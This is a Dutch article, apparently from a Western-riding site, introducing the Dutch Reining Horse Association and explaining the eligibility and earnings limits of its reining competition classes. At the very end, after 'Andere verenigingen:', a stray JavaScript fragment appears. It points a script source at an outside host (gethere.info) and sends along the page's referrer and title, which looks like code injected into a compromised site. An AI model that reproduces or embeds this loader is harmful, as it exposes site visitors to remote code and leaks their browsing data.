DRHA

De Dutch Reining Horse Association (DRHA) is één van de bekendste verenigingen in Nederland op het gebied van de discipline reining. De DRHA is een affiliatie van de National Reining Horse Associatie (NRHA) en werkt nauw samen met deze vereniging om haar doelstelling, namelijk het bevorderen van de reiningsport als breedte- en recreatiesport, te kunnen realiseren.

De DRHA stelt zich ten doel om de reiningsport als breedte- en recreatiesport te bevorderen. Dit doet zij door middel van nauwe samenwerkingen met de NRHA, de Koninklijke Nederlandse Hippische Sportfederatie(KNHS) en met andere reiningorganisaties die lid zijn van de KNHS.

Wedstrijden & klassenuitleg

Om de doelstelling te kunnen realiseren, organiseert de DRHA jaarlijks gemiddeld vijf wedstrijden op één vaste locatie. Dit is vaak een vierdaags-evenement en wordt gehouden in Wanroij (Nederland). De discipline die verreden wordt is reining. De wedstrijden, in samenwerking met de NRHA, worden verreden volgens een breed aantal klassen. WesternToday zet ze even op een rijtje:

 1. Youth 14-18 & Youth 13-under
 2. Green as Grass (DRHA)
 3. Rookie level 1 & 2 (NRHA)
 4. Limited Non Pro (NRHA)
 5. Intermediate Non-Pro (NRHA)
 6. Non-Pro (NRHA)
 7. Snaffle bit Hackamore 5 years & under Non Pro (NRHA)
 8.            Snaffle Bit Hackamore 4 Years & under Open (NRHA)
 9.            Rookie Professional (NRHA)
 10. Limited Open (NRHA)
 11.          Intermediate Open (NRHA)
 12.          Open (NRHA)
 13.      Novice horse Non Pro / Open
 14.          Any Horse Any Rider (DRHA)

 

Green as Grass

De eerste klasse waarin gestart kan worden is de Green as Grass. Dit is de laagste klasse. In deze klasse mag er gereden worden op twee handen en op elk legaal (NRHA) bit. Wanneer je aan deze klasse mee wilt doen, mag je aan het begin van het kalenderjaar niet meer dan €135,- prijzengeld hebben verdiend. De klasse is daarnaast enkel toegestaan voor Non Pro ruiters.

Youth klassen

De NRHA kent verschillende jeugdklassen, namelijk de Youth 14-18, Youth 13&Under en de Youth Short Stirrup voor kinderen van 10 jaar en jonger. Deze laatste klasse wordt bijna nooit uitgeschreven in Nederland en België. De klasse verdeling is dus op basis van de leeftijd van de jeugdruiter.

Rookie klassen

De tweede klasse is de Rookie en ook deze heeft twee levels. Beide levels zijn toegankelijk voor ruiters met een geldig NRHA Non Pro lidmaatschap. In de Rookie 1 mogen de ruiters niet meer dan $500,- lifetime earnings hebben en ze mogen niet meer dan 100 punten in de jeugd klasse verdiend hebben. In de Rookie 2 ligt deze grens iets hoger, want dan mag je tot $1500,- lifetime earnings hebben en niet meer dan 200 punten in de jeugdklassen. In deze klasse mag het paard enkel op één hand geshowd worden.

Non Pro klassen

Na de Rookie-klasse komen de Non Pro klassen. De Non Pro klassen zijn toegankelijk voor elke ruiter met een geldig NRHA Non Pro lidmaatschap. Dit zijn ruiters die zich niet beroepsmatig met de sport bezighouden. Een Non Pro ruiter mag dus geen paarden trainen en/of les geven tegen betaling. De Non Pro klassen zijn weer opgedeeld in drie niveaus, namelijk de Limited Non Pro, Intermediate Non Pro en de Non Pro. De verschillen liggen in de lifetime earnings, oftewel het totale bedrag dat is verdiend tijdens NRHA-wedstrijden. Bij de Limited Non Pro ligt de grens bij de $10.000 aan lifetime earnings, bij de intermediate Non Pro ligt de grens bij het bedrag van $10.000 dat is verdiend in de twee voorafgaande kalenderjaren en bij de Non Pro maakt het niet uit hoeveel de ruiter gedurende zijn levensjaren heeft verdiend.

Snaffle bit Hackamore klassen

De Snaffle bit Hackamore 5 years & under Non-Pro is bestemd Non-Pro ruiters met paarden van vijf jaar of jonger. Daarnaast mag er enkel gereden worden op een snaffle bit of een hackamore. De klasse Snaffle bit Hackamore 4 years & under Open is bestemd voor open ruiters met paarden van vier jaar of jonger.

Rookie Professional

De Rookie Professional is bestemd voor elke ruiter die niet meer dan $2.500 lifetime earnings heeft verdiend op NRHA wedstrijden. Een ruiter met een Non Pro card mag niet aan de Rookie Professional meedoen.

Open klassen

De open klassen zijn, net zoals de Non Pro, opgedeeld in drie niveaus, namelijk de Limited Open, Intermediate Open en de Open. Aan de Limited Open mag elke ruiter meedoen met een geldig NRHA lidmaatschap die maximaal $10.000 aan lifetime earnings heeft verdiend op NRHA wedstrijden. De Intermediate Open is tevens toegankelijk voor elke ruiter met een geldig NRHA lidmaatschap. Echter mag deze ruiter gedurende de aan het kalenderjaar voorafgaande twee kalenderjaren niet meer dan $17.500 hebben verdiend op NRHA wedstrijden. In de Open klasse mag iedere ruiter met een geldig NRHA lidmaatschap met elk paard starten. Het maakt in deze klasse niet uit hoeveel de ruiter gedurende zijn/haar levensjaren op NRHA wedstrijden heeft verdiend.

Novice Horse Open / Non Pro

Deze klasse is verdeeld in twee categorieën. De Novice Horse level 1 is enkel voor paarden die niet meer dan $5.000 aan lifetime earnings hebben en categorie 2 is enkel voor paarden die niet meer dan $25.000 lifetime earnings hebben.

Any Horse Any Rider

Tot slot de klasse ‘Any Horse Any Rider’. Deze klasse met ingang van 2014 in het leven geroepen. Om aan deze klasse mee te mogen doen, moet je lid zijn van de DRHA. Zoals de naam van de klasse al zegt, is deze klasse bestemd voor elke ruiter en elk paard. Paarden mogen op elk legaal bit gereden worden op één of twee handen. Daarnaast mogen Non Pro Ruiters paarden starten die niet in hun bezit zijn, mits de eigenaar tevens lid is van de DRHA. Voor deze klasse geldt geen limiet op lifetime earnings.

Meer informatie over deze vereniging en/of lid worden? Kijk dan op de website van de DRHA, www.drha.nl, of stuur een e-mail naar info@drha.nl.
Andere verenigingen:

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;